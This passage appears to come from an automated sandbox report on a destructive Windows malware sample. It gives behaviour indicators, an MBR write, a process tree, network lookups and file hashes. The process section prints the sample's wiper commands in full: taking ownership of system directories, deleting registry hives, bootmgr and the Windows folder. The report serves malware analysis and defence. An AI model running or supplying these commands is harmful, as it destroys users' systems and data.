| File opened for modification | C:\Windows\System32\drivers\HdAudio.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\hidparse.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\msquic.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\srv2.sys | C:\Windows\system32\cmd.exe | N/A |
Manipulates Digital Signatures
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\wintrust.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\wintrust.dll | C:\Windows\system32\cmd.exe | N/A |
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
Boot or Logon Autostart Execution: Print Processors
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\spool\prtprocs\x64\winprint.dll | C:\Windows\system32\cmd.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\34567c920c1f841bc358af797a1a68a44e2a62bef2681cc4805305a4291ff7a0.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
Reads user/profile data of web browsers
Indicator Removal: File Deletion
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Local\Temp\34567c920c1f841bc358af797a1a68a44e2a62bef2681cc4805305a4291ff7a0.exe | N/A |
Drops autorun.inf file
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\BitLockerDiscoveryVolumeContents\autorun.inf | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\x86_microsoft-windows-s..ccessagent-binaries_31bf3856ad364e35_10.0.19041.1_none_3802d0d85b60df4c\autorun.inf | C:\Windows\system32\cmd.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\imm32.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\Windows.Cortana.ProxyStub.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\Windows.Gaming.Input.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\adsldp.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\samlib.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\windows.storage.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\WinMetadata\Windows.Web.winmd | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\globinputhost.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\config\SAM.LOG1 | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\lsass.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\ngcpopkeysrv.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\winevt\Logs\INTERN~1.EVT | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\MTF.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\AboveLockAppHost.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\en-US\Conhost.exe.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\msdelta.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\winevt\Logs\MI1C6C~1.EVT | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\dhcpcsvc6.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\FileRepository\kdnic.inf_amd64_6649425cdcae9b5f\kdnic.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\hid.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\MTFServer.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\sbservicetrigger.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\kernel32.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\FileRepository\netrtl64.inf_amd64_8e9c2368fe308df2\Rtnic64.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\en-US\APMon.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\FWPUCLNT.DLL | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\msasn1.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\PortableDeviceApi.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\stdole2.tlb | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\Windows.Networking.Connectivity.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\winevt\Logs\MI4B6B~1.EVT | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\winevt\Logs\MICEDD~1.EVT | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\winevt\Logs\OALERT~1.EVT | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\en-US\svchost.exe.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\config\SAM.LOG2 | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\csrss.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\msutb.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\Windows.UI.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\dwmredir.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\ntlanman.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\en-US\gpsvc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\MSWB7.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\PortableDeviceTypes.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\UiaManager.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\nsi.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\rometadata.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\Windows.CloudStore.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\netprovfw.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\dcomp.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\en-US\netmsg.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\twinui.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\NPSM.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\WlanRadioManager.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\RTWorkQ.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\vssapi.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\Windows.Globalization.Fontgroups.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\Chakra.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\en-US\twinui.pcshell.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\winevt\Logs\MI7771~1.EVT | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\wow64.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\config\TxR\{53B39~2.BLF | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\spoolsv.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\en-US\AudioEndpointBuilder.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\winevt\Logs\MI8607~1.EVT | C:\Windows\system32\cmd.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\WinSxS\AMF487~1.111\afunix.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\AMD64_~4.108\TILEDA~1.DLL | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\AM79D1~1.128\lsasrv.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\AM19E5~1.1_N\negoexts.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\AM2051~1.120\SBSERV~1.DLL | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\x86_microsoft-windows-s..-binaries.resources_31bf3856ad364e35_10.0.19041.1_da-dk_08e07c485e058eb0\DA-DK_~1.MUI | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\SERVIC~1\LOCALS~1\AppData\Roaming\MICROS~1\Windows\Recent | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\AM2B4E~1.128\dwmcore.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\CCME_B~1.DLL | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\AMDFE5~1.126\INPUTL~1.DLL | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\AM80F6~1.123\mrxsmb20.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\AM8B88~1.1_E\CLIPSV~1.MUI | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\AM2590~1.906\cryptnet.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\AM2DCF~1.610\logoncli.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\AM6BD9~1.1_N\segoeui.ttf | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\AM180E~1.1_N\segmdl2.ttf | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\AME828~1.1_E\INPUTS~1.MUI | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\x86_microsoft-windows-s..-binaries.resources_31bf3856ad364e35_10.0.19041.1_sr-..-rs_3c7b8ddb0a8496f4\SR-LAT~1.MUI | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\x86_microsoft-windows-s..ccessagent-binaries_31bf3856ad364e35_10.0.19041.1_none_3802d0d85b60df4c\autorun.inf | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\SERVIC~1\LOCALS~1\NTUSER~2.REG | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\AM747A~1.546\sfc_os.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\adobepdf.xdc | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\COLLEC~1.AAP | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\SERVIC~1\LOCALS~1\FAVORI~1 | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\AM5D5F~1.1_N\RstrtMgr.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\Checkers.api | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\bootstat.dat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\SystemResources\Windows.UI.SettingsAppThreshold\SystemSettings\Assets\Fonts | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\AM039F~1.120\MSKEYP~1.DLL | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\AM5224~1.985\oleaut32.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\AM4D81~1.123\fveapi.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\BitLockerDiscoveryVolumeContents\ja-JP_BitLockerToGo.exe.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\AM7C93~1.126\wevtapi.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\AM0951~1.1_N\lmhsvc.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\AM2915~1.128\fwbase.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\SYMBOL~1.TXT | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\x86_microsoft-windows-s..-binaries.resources_31bf3856ad364e35_10.0.19041.1_uk-ua_d90616947cd51d4e\UK-UA_~1.MUI | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\AME830~1.102\WINDOW~1.DLL | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\AM6434~1.207\sxssrv.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\AM32A2~1.115\mssrch.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Installer\$PatchCache$\Managed\00006109E70000000100000000F01FEC\16.0.12527\VCCORL~2.DLL | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\AMC899~1.1_N\null.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\AMB3A9~1.844\wpncore.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\x86_microsoft-windows-s..-binaries.resources_31bf3856ad364e35_10.0.19041.1_es-es_aec844614ee0e0b4\ES-ES_~1.MUI | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\AM5C98~1.128\daxexec.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\AM9F71~1.120\ole32.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\AMDFE5~1.126\TEXTIN~2.DLL | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\AMA5D4~1.746\WINDOW~1.DLL | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Installer\$PatchCache$\Managed\1D5E3C0FEDA1E123187686FED06E995A\10.0.40219\F_C9E2~1 | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\FILLSI~1.AAP | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Installer\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\PDXFIL~1.ICO | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\AMD831~1.1_N\rdpbus.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\AMD82F~1.115\ClipSVC.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Installer\$PatchCache$\Managed\1926E8D15D0BCE53481466615F760A7F\10.0.40219\F_785C~1 | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\a3dutils.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\PrintDialog\Assets | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\AMD024~1.1_N\umbus.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\AM0FA4~1.1_N\netjoin.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\AM8F2F~1.546\wmidcom.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Installer\$PatchCache$\Managed\1926E8D15D0BCE53481466615F760A7F\10.0.40219\F_4725~1 | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Installer\$PatchCache$\Managed\1D5E3C0FEDA1E123187686FED06E995A\10.0.40219\F_CENT~4 | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\AM3684~1.108\unsecapp.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\AM962C~1.546\xmllite.dll | C:\Windows\system32\cmd.exe | N/A |
Enumerates physical storage devices
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\34567c920c1f841bc358af797a1a68a44e2a62bef2681cc4805305a4291ff7a0.exe
"C:\Users\Admin\AppData\Local\Temp\34567c920c1f841bc358af797a1a68a44e2a62bef2681cc4805305a4291ff7a0.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c takeown /f %windir%\System32\Taskkill.exe >nul 2>nul && icacls %windir%\System32\Taskkill.exe /grant administrators:F >nul 2>nul
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\Taskkill.exe
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\Taskkill.exe /grant administrators:F
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c del /s /f /q %windir%\System32\Taskkill.exe >nul 2>nul
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c takeown /f %windir%\System32\Tskill.exe >nul 2>nul && icacls %windir%\System32\Tskill.exe /grant administrators:F >nul 2>nul
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\Tskill.exe
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\Tskill.exe /grant administrators:F
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c del /s /f /q %windir%\System32\Tskill.exe >nul 2>nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c takeown /f %windir%\*.* >nul 2>nul && icacls %windir%\*.* /grant administrators:F >nul 2>nul
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\*.*
C:\Windows\system32\icacls.exe
icacls C:\Windows\*.* /grant administrators:F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c takeown /f %windir%\System32\*.* >nul 2>nul && icacls %windir%\System32\*.* /grant administrators:F >nul 2>nul
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\*.*
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\*.* /grant administrators:F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg delete HKCR/* /f >nul 2>nul
C:\Windows\system32\reg.exe
reg delete HKCR/* /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg delete HKCR/.exe /f >nul 2>nul
C:\Windows\system32\reg.exe
reg delete HKCR/.exe /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg delete HKCR/exefile /f >nul 2>nul
C:\Windows\system32\reg.exe
reg delete HKCR/exefile /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg delete HKCR/.dll /f >nul 2>nul
C:\Windows\system32\reg.exe
reg delete HKCR/.dll /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg delete HKCU/* /va /f >nul 2>nul
C:\Windows\system32\reg.exe
reg delete HKCU/* /va /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg delete HKLM/* /va /f >nul 2>nul
C:\Windows\system32\reg.exe
reg delete HKLM/* /va /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg delete HKU/* /va /f >nul 2>nul
C:\Windows\system32\reg.exe
reg delete HKU/* /va /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg delete HKCC/* /va /f >nul 2>nul
C:\Windows\system32\reg.exe
reg delete HKCC/* /va /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c takeown /f C:\bootmgr >nul 2>nul && icacls C:\bootmgr /grant administrators:F >nul 2>nul && attrib -s -h -r C:\bootmgr
C:\Windows\system32\takeown.exe
takeown /f C:\bootmgr
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c del /s /f /q C:\bootmgr >nul 2>nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q /a %windir% >nul 2>nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c rd /s /q %windir% >nul 2>nul
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.27.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 75.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
Files
memory/1180-0-0x0000000000400000-0x000000000040D000-memory.dmp
C:\Windows\System32\shlwapi.dll
| MD5 | 800fb7d0317b3ab92f7099516acb49e0 |
| SHA1 | 3e2ace507216082b1882098d2fe19a9cf2981731 |
| SHA256 | 4e9fb3235a2665f139ed2d3f9068cae8377614030e911e6398da91c526fe4729 |
| SHA512 | 5cc8498da97f25d40fadd2c28b70cbf20393a8e5cdba94f9fbb76820fefe51b62bd695aeacff3379be5b0ea4339d05aeeb2ceb76f69ad19777dcf8ef8342e5a7 |
C:\Windows\System32\windows.storage.dll
| MD5 | 97911ac8994e09679bf973f8efc49c40 |
| SHA1 | c15af8f29b7fa92caad1abbffcb04bde7c40e99d |
| SHA256 | 5195514bd26d15bbe830b3ebd0f96111d856088e1e9d81722ef09ada4d222021 |
| SHA512 | 04577b9fbe0bb284b7881d6be2b3de5ac702753fa2040fe97dbd93654839f65cbcf5b19438fb824cee82b4f1cc8d216d09b5cb5d5cebc6f7f1d4de7a77cb016a |